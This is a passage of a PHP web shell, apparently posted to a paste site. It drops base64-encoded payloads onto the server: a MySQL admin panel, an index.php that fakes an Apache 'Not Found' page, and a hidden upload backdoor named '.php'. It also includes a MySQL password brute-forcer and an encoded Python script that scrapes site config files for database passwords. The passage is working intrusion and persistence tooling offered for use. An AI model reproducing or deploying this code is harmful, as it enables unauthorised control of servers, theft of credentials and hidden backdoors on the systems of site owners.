AvLw0KZXJyb3JfcmVwb3J0aW5nKDApOw0KaW5pX3NldCAoJ2Rpc3BsYXlfZXJyb3JzJywgMCk7DQppbmlfc2V0ICgnbG9nX2Vycm9ycycsIDApOw0KaWYoICRhY3Rpb24gPT0gImxvZ29uIiB8fCAkYWN0aW9uID09ICIiIHx8ICRhY3Rpb24gPT0gImxvZ291dCIgKQ0KCWxvZ29uKCk7DQplbHNlIGlmKCAkYWN0aW9uID09ICJiRzluYjI1ZmMzVmliV2wwIiApDQoJbG9nb25fc3VibWl0KCk7DQplbHNlIGlmKCAkYWN0aW9uID09ICJkdW1wVGFibGUiIHx8ICRhY3Rpb24gPT0gImR1bXBEQiIgKSB7DQoJd2hpbGUoIGxpc3QoJHZhciwgJHZhbHVlKSA9IGVhY2goJEhUVFBfQ09PS0lFX1ZBUlMpICkgew0KCQlpZiggJHZhciA9PSAibXlzcWxfd2ViX2FkbWluX3VzZXJuYW1lIiApICRVU0VSTkFNRSA9ICR2YWx1ZTsNCgkJaWYoICR2YXIgPT0gIm15c3FsX3dlYl9hZG1pbl9wYXNzd29yZCIgKSAkUEFTU1dPUkQgPSAkdmFsdWU7DQoJCWlmKCAkdmFyID09ICJteXNxbF93ZWJfYWRtaW5faG9zdG5hbWUiICkgJEhPU1ROQU1FID0gJHZhbHVlOw0KCX0NCgkkbXlzcWxIYW5kbGUgPSBAbXlzcWxfY29ubmVjdCggJEhPU1ROQU1FLiI6MzMwNiIsICRVU0VSTkFNRSwgJFBBU1NXT1JEICk7DQoJZHVtcCgpOw0KfSBlbHNlIHsNCgl3aGlsZSggbGlzdCgkdmFyLCAkdmFsdWUpID0gZWFjaCgkSFRUUF9DT09LSUVfVkFSUykgKSB7DQoJCWlmKCAkdmFyID09ICJteXNxbF93ZWJfYWRtaW5fdXNlcm5hbWUiICkgJFVTRVJOQU1FID0gJHZhbHVlOw0KCQlpZiggJHZhciA9PSAibXlzcWxfd2ViX2FkbWluX3Bhc3N3b3JkIiApICRQQVNTV09SRCA9ICR2YWx1ZTsNCgkJaWYoICR2YXIgPT0gIm15c3FsX3dlYl9hZG1pbl9ob3N0bmFtZSIgKSAkSE9TVE5BTUUgPSAkdmFsdWU7DQoJfQ0KCWVjaG8gIjwhLS0iOw0KCSRteXNxbEhhbmRsZSA9IEBteXNxbF9jb25uZWN0KCAkSE9TVE5BTUUuIjozMzA2IiwgJFVTRVJOQU1FLCAkUEFTU1dPUkQgKTsNCgllY2hvICItLT4iOw0KCWlmKCAkbXlzcWxIYW5kbGUgPT0gZmFsc2UgKSB7DQoJCWVjaG8gIjx0YWJsZSB3aWR0aD0xMDAlIGhlaWdodD0xMDAlPjx0cj48dGQ+PGNlbnRlcj5cbiI7DQoJCWVjaG8gIjxoMT5Xcm9uZyBQYXNzd29yZCE8L2gxPlxuIjsNCgkJZWNobyAiPGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1sb2dvbic+TG9nb248L2E+XG4iOw0KCQllY2hvICI8L2NlbnRlcj48L3RkPjwvdHI+PC90YWJsZT5cbiI7DQoJfSBlbHNlIHsNCgkJaWYoICRhY3Rpb24gPT0gImJHbHpkRVJDY3c9PSIgKQ0KCQkJbGlzdERhdGFiYXNlcygpOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJjcmVhdGVEQiIgKQ0KCQkJY3JlYXRlRGF0YWJhc2UoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZHJvcERCIiApDQoJCQlkcm9wRGF0YWJhc2UoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAibGlzdFRhYmxlcyIgKQ0KCQkJbGlzdFRhYmxlcygpOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJjcmVhdGVUYWJsZSIgKQ0KCQkJY3JlYXRlVGFibGUoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZHJvcFRhYmxlIiApDQoJCQlkcm9wVGFibGUoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAidmlld1NjaGVtYSIgKQ0KCQkJdmlld1NjaGVtYSgpOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJxdWVyeSIgKQ0KCQkJdmlld0RhdGEoICRxdWVyeVN0ciApOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJhZGRGaWVsZCIgKQ0KCQkJbWFuYWdlRmllbGQoICJhZGQiICk7DQoJCWVsc2UgaWYoICRhY3Rpb24gPT0gImFkZEZpZWxkX3N1Ym1pdCIgKQ0KCQkJbWFuYWdlRmllbGRfc3VibWl0KCAiYWRkIiApOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJlZGl0RmllbGQiICkNCgkJCW1hbmFnZUZpZWxkKCAiZWRpdCIgKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZWRpdEZpZWxkX3N1Ym1pdCIgKQ0KCQkJbWFuYWdlRmllbGRfc3VibWl0KCAiZWRpdCIgKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZHJvcEZpZWxkIiApDQoJCQlkcm9wRmllbGQoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZG1sbGQwUmhkR0U9IiApDQoJCQl2aWV3RGF0YSggIiIgKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiYWRkRGF0YSIgKQ0KCQkJbWFuYWdlRGF0YSggImFkZCIgKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiYWRkRGF0YV9zdWJtaXQiICkNCgkJCW1hbmFnZURhdGFfc3VibWl0KCAiYWRkIiApOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJlZGl0RGF0YSIgKQ0KCQkJbWFuYWdlRGF0YSggImVkaXQiICk7DQoJCWVsc2UgaWYoICRhY3Rpb24gPT0gImVkaXREYXRhX3N1Ym1pdCIgKQ0KCQkJbWFuYWdlRGF0YV9zdWJtaXQoICJlZGl0IiApOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJkZWxldGVEYXRhIiApDQoJCQlkZWxldGVEYXRhKCk7DQoJCWVsc2UgaWYoICRhY3Rpb24gPT0gInV0aWxzIiApDQoJCQl1dGlscygpOw0KCQlteXNxbF9jbG9zZSggJG15c3FsSGFuZGxlKTsNCgkJZm9vdGVyX2h0bWwoKTsNCgl9DQp9DQo/Pg0KPGh0bWw+DQo8aGVhZD4NCjx0aXRsZT5NeVNRTCBJbnRlcmZhY2UgKERldmVsb3BlZCBCeSBNb2hhamVyMjIpPC90aXRsZT4NCjxib2R5IGJnQ29sb3I9IzAwMDAwMCA+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KPCEtLQ0KcC5sb2NhdGlvbiB7DQoJY29sb3I6ICMwMEZGMDA7DQp9DQpoMSwgaDIsIGgzIHsNCgljb2xvcjogIzAwRkYwMDsNCn0NCnRoIHsNCgliYWNrZ3JvdW5kLWNvbG9yOiAjMjIyMjIyOw0KCWNvbG9yOiAjMDBGRjAwOw0KCWZvbnQtc2l6ZTogc21hbGw7DQp9DQp0ZCB7DQoJY29sb3I6ICMwMEZGMDA7DQoJYmFja2dyb3VuZC1jb2xvcjogIzQ0NDQ0NDsNCglmb250LXNpemU6IHNtYWxsOw0KfQ0KZm9ybSB7DQoJbWFyZ2luLXRvcDogMDsNCgltYXJnaW4tYm90dG9tOiAwOw0KfQ0KYSB7DQoJdGV4dC1kZWNvcmF0aW9uOm5vbmU7DQoJY29sb3I6ICMwMEZGMDA7DQoJZm9udC1zaXplOnNtYWxsOw0KfQ0KQTpsaW5rIHsNCkNPTE9SOiNGRkZGRkY7DQpURVhULURFQ09SQVRJT046IG5vbmUNCn0NCkE6dmlzaXRlZCB7DQpDT0xPUjojMDBGRjAwOw0KVEVYVC1ERUNPUkFUSU9OOiBub25lDQp9DQpBOmFjdGl2ZSB7DQpDT0xPUjojMDBGRjAwOw0KVEVYVC1ERUNPUkFUSU9OOiBub25lDQp9DQpBOmhvdmVyIHsNCmNvbG9yOiMwMEZGMDA7DQpURVhULURFQ09SQVRJT046IG5vbmUNCn0NCmlucHV0LCBzZWxlY3QsIHRleHRhcmVhIHsNCmJhY2tncm91bmQtY29sb3I6ICMwMDAwMDA7DQpib3JkZXItc3R5bGU6IHNvbGlkOw0KZm9udC1mYW1pbHk6IFRhaG9tYSxWZXJkYW5hLEFyaWFsLFNhbnMtU2VyaWY7DQpmb250LXNpemU6c21hbGw7DQpjb2xvcjogIzAwRkYwMDsNCnBhZGRpbmc6IDBweDsNCn0NCmxpIHsNCmNvbG9yOiAjMDBGRjAwOw0KfQ0KLm5ldyB7DQpjb2xvcjogIzAwRkYwMDsNCn0NCi8vLS0+DQo8L3N0eWxlPg0KPC9oZWFkPg==';
  820. $file = fopen("db-sql.php" ,"w+");
  821. $write = fwrite ($file ,base64_decode($sqlshell));
  822. fclose($file);
  823. chmod("db-sql.php", 0644);
  824. $indexshell = fopen("index.php" ,"w+");
  825. $data = 'PGgxPk5vdCBGb3VuZDwvaDE+IA0KPHA+VGhlIHJlcXVlc3RlZCBVUkwgd2FzIG5vdCBmb3VuZCBvbiB0aGlzIHNlcnZlci48L3A+IA0KPGhyPiANCjxhZGRyZXNzPkFwYWNoZSBTZXJ2ZXIgYXQgPD89JF9TRVJWRVJbJ0hUVFBfSE9TVCddPz4gUG9ydCA4MDwvYWRkcmVzcz4gDQogICAgPHN0eWxlPiANCiAgICAgICAgaW5wdXQgeyBtYXJnaW46MDtiYWNrZ3JvdW5kLWNvbG9yOiNmZmY7Ym9yZGVyOjFweCBzb2xpZCAjZmZmOyB9IA0KICAgIDwvc3R5bGU+';
  826. $tulis = fwrite( $indexshell, base64_decode($data));
  827. fclose($indexshell);
  828. echo "<iframe src=mysql/db-sql.php width=97% height=100% frameborder=0></iframe>";
  829. }
  830.  
  831. elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){
  832. @ob_start();
  833. @eval("phpinfo();");
  834. $buff = @ob_get_contents();
  835. @ob_end_clean();
  836. $awal = strpos($buff,"<body>")+6;
  837. $akhir = strpos($buff,"</body>");
  838. echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>";
  839. }
  840. elseif(isset($_GET['view']) && ($_GET['view'] != "")){
  841. if(is_file($_GET['view'])){
  842. if(!isset($file)) $file = magicboom($_GET['view']);
  843. if(!$win && $posix){
  844. $name=@posix_getpwuid(@fileowner($folder));
  845. $group=@posix_getgrgid(@filegroup($folder));
  846. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  847. }
  848. else {
  849. $owner = $user;
  850. }
  851. $filn = basename($file);
  852. echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\">
  853. <tr><td>Filename</td><td><span id=\"".clearspace($filn)."_link\">".$file."</span>
  854. <form action=\"?y=".$pwd."&amp;view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  855. <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" />
  856. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" />
  857. <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  858. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" />
  859. </form>
  860. </td></tr>
  861. <tr><td>Size</td><td>".ukuran($file)."</td></tr>
  862. <tr><td>Permission</td><td>".get_perms($file)."</td></tr>
  863. <tr><td>Owner</td><td>".$owner."</td></tr>
  864. <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr>
  865. <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr>
  866. <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr>
  867. <tr><td>Actions</td><td><a href=\"?y=$pwd&amp;edit=$file\">edit</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;delete=$file\">delete</a> | <a href=\"?y=$pwd&amp;dl=$file\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$file\">gzip</a>)</td></tr>
  868. <tr><td>View</td><td><a href=\"?y=".$pwd."&amp;view=".$file."\">text</a> | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=code\">code</a> | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=image\">image</a></td></tr>
  869. </table>
  870. ";
  871. if(isset($_GET['type']) && ($_GET['type']=='image')){
  872. echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&amp;img=".$filn."\"></div>";
  873. }
  874. elseif(isset($_GET['type']) && ($_GET['type']=='code')){
  875. echo "<div class=\"viewfile\">";
  876. $file = wordwrap(@file_get_contents($file),"240","\n");
  877. @highlight_string($file);
  878. echo "</div>";
  879. }
  880. else {
  881. echo "<div class=\"viewfile\">";
  882. echo nl2br(htmlentities((@file_get_contents($file))));
  883. echo "</div>";
  884. }
  885. }
  886. elseif(is_dir($_GET['view'])){
  887. echo showdir($pwd,$prompt);
  888. }
  889.  
  890. }
  891. elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){
  892.  
  893. if(isset($_POST['save'])){
  894. $file = $_POST['saveas'];
  895. $content = magicboom($_POST['content']);
  896. if($filez = @fopen($file,"w")){
  897. $time = date("d-M-Y H:i",time());
  898. if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time;
  899. else $msg = "failed to save";
  900. @fclose($filez);
  901. }
  902. else $msg = "permission denied";
  903. }
  904. if(!isset($file)) $file = $_GET['edit'];
  905. if($filez = @fopen($file,"r")){
  906. $content = "";
  907. while(!feof($filez)){
  908. $content .= htmlentities(str_replace("''","'",fgets($filez)));
  909. }
  910. @fclose($filez);
  911. }
  912.  
  913. ?>
  914. <form action="?y=<?php echo $pwd; ?>&amp;edit=<?php echo $file; ?>" method="post">
  915. <table class="cmdbox">
  916. <tr><td colspan="2">
  917. <textarea class="output" name="content">
  918. <?php echo $content; ?>
  919. </textarea>
  920. <tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" />
  921. &nbsp;<?php echo $msg; ?></td></tr>
  922. </table>
  923. </form>
  924. <?php
  925. }
  926. elseif(isset($_GET['x']) && ($_GET['x'] == 'logout'))
  927. {
  928. ?>
  929. <form action="?y=<?php echo $pwd; ?>&amp;x=logout" method="post">
  930.  
  931. <?php
  932. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  933. echo '<br><br>Disconnected...<br><br>';
  934. }
  935. elseif(isset($_GET['x']) && ($_GET['x'] == 'brute'))
  936. {
  937. ?>
  938. <form action="?y=<?php echo $pwd; ?>&amp;x=brute" method="post">
  939. <?php
  940. //bruteforce
  941. ?>
  942. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  943. <?php
  944. /*
  945. Recoded By X'1n73ct
  946. */
  947. @set_time_limit(0);
  948. @error_reporting(0);
  949.  
  950.  
  951. if($_POST['page']=='find')
  952. {
  953. if(isset($_POST['usernames']) && isset($_POST['passwords']))
  954. {
  955. if($_POST['type'] == 'passwd'){
  956. $e = explode("\n",$_POST['usernames']);
  957. foreach($e as $value){
  958. $k = explode(":",$value);
  959. $username .= $k['0']." ";
  960. }
  961. }elseif($_POST['type'] == 'simple'){
  962. $username = str_replace("\n",' ',$_POST['usernames']);
  963. }
  964. $a1 = explode(" ",$username);
  965. $a2 = explode("\n",$_POST['passwords']);
  966. $id2 = count($a2);
  967. $ok = 0;
  968. foreach($a1 as $user )
  969. {
  970. if($user !== '')
  971. {
  972. $user=trim($user);
  973. for($i=0;$i<=$id2;$i++)
  974. {
  975. $pass = trim($a2[$i]);
  976. if(@mysql_connect('localhost',$user,$pass))
  977. {
  978. echo "X'1n73ct~ user is (<b><font color=green>$user</font></b>) Password is (<b><font color=green>$pass</font></b>)<br />";
  979. $ok++;
  980. }
  981. }
  982. }
  983. }
  984. echo "<hr><b>You Found <font color=green>$ok</font> Cpanel by x'1n73ct</b>";
  985. echo "<center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
  986. exit;
  987. }
  988. }
  989. if($_POST['pass']=='password'){
  990. @error_reporting(0);
  991. $i = getenv('REMOTE_ADDR');
  992. $d = date('D, M jS, Y H:i',time());
  993. $h = $_SERVER['HTTP_HOST'];
  994. $dir=$_SERVER['PHP_SELF'];
  995. $back = "PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCmlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJzxiPktvcmFuZyBEYWggQmVyamF5YSBVcGxvYWQgU2hlbGwgS29yYW5nISEhPGI+PGJyPjxicj4nOyB9DQplbHNlIHsgZWNobyAnPGI+S29yYW5nIEdhZ2FsIFVwbG9hZCBTaGVsbCBLb3JhbmchISE8L2I+PGJyPjxicj4nOyB9DQp9DQo/Pg==";
  996. $file = fopen(".php","w+");
  997. $write = fwrite ($file ,base64_decode($back));
  998. fclose($file);
  999. chmod(".php",0755);
  1000. mkdir('config',0755);
  1001. $cp =
  1002. 'IyEvdXNyL2Jpbi9lbnYgcHl0aG9uDQoNCicnJw0KQnk6IEFobWVkIFNoYXdreSBha2EgbG54ZzMzaw0KdGh4OiBPYnp5LCBSZWxpaywgbW9oYWIgYW5kICNhcmFicHduIA0KJycnDQoNCmltcG9ydCBzeXMNCmltcG9ydCBvcw0KaW1wb3J0IHJlDQppbXBvcnQgc3VicHJvY2Vzcw0KaW1wb3J0IHVybGxpYg0KaW1wb3J0IGdsb2INCmZyb20gcGxhdGZvcm0gaW1wb3J0IHN5c3RlbQ0KDQppZiBsZW4oc3lzLmFyZ3YpICE9IDM6DQogIHByaW50JycnCQ0KIFVzYWdlOiAlcyBbVVJMLi4uXSBbZGlyZWN0b3J5Li4uXQ0KIEV4KSAlcyBodHRwOi8vd3d3LnRlc3QuY29tL3Rlc3QvIFtkaXIgLi4uXScnJyAlIChzeXMuYXJndlswXSwgc3lzLmFyZ3ZbMF0pDQogIHN5cy5leGl0KDEpDQoNCnNpdGUgPSBzeXMuYXJndlsxXQ0KZm91dCA9IHN5cy5hcmd2WzJdDQoNCnRyeToNCiAgcmVxICA9IHVybGxpYi51cmxvcGVuKHNpdGUpDQogIHJlYWQgPSByZXEucmVhZCgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAndycpDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZiA9IG9wZW4oJ2RhdGEudHh0JywgJ3cnKSAgDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KDQogIGkgPSAwDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBmID0gb3BlbignZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgY2xlYW51cCA9IHN1YnByb2Nlc3MuUG9wZW4oJ3JtIC1yZiAvdG1wL2RhdGEudHh0ID4gL2Rldi9udWxsJywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBjbGVhbnVwID0gc3VicHJvY2Vzcy5Qb3BlbignZGVsIEM6XGRhdGEudHh0Jywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIHByaW50ICdcbicsICctJyAqIDEwMCwgJ1xuJw0KICBpZiBzeXN0ZW0oKSA9PSAnTGludXgnOg0KICAgIGZvciByb290LCBkaXJzLCBmaWxlcyBpbiBvcy53YWxrKGZvdXQpOg0KICAgICAgZm9yIGZuYW1lIGluIGZpbGVzOg0KICAgICAgICBmdWxscGF0aCA9IG9zLnBhdGguam9pbihyb290LCBmbmFtZSkNCiAgICAgICAgZiA9IG9wZW4oZnVsbHBhdGgsICdyJykNCiAgICAgICAgZm9yIGxpbmUgaW4gZjoNCiAgICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3IgaXMgbm90IE5vbmU6IHByaW50IChzZWNyLmdyb3VwKDIpKSAgDQogICAgICAgICAgc2VjcjEgPSByZS5zZWFyY2gociIocGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3IyID0gcmUuc2VhcmNoKHIiKERCX1BBU1NXT1JEJykoLi4uKSguK1tePl0pKCcpIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyMiBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3IyLmdyb3VwKDMpKQ0KICAgICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjMgaXMgbm90IE5vbmU6IHByaW50IChzZWNyMy5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNCA9IHJlLnNlYXJjaCAociIoREJQQVNTV09SRCA9ICcpKC4rW14+XSkoLjspIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3I1ID0gcmUuc2VhcmNoIChyIihEQnBhc3MgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjUgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNS5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjYgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNi5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNyA9IHJlLnNlYXJjaCAociIobW9zQ29uZmlnX3Bhc3N3b3JkID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZm9yIGluZmlsZSBpbiBnbG9iLmdsb2IoIG9zLnBhdGguam9pbihmb3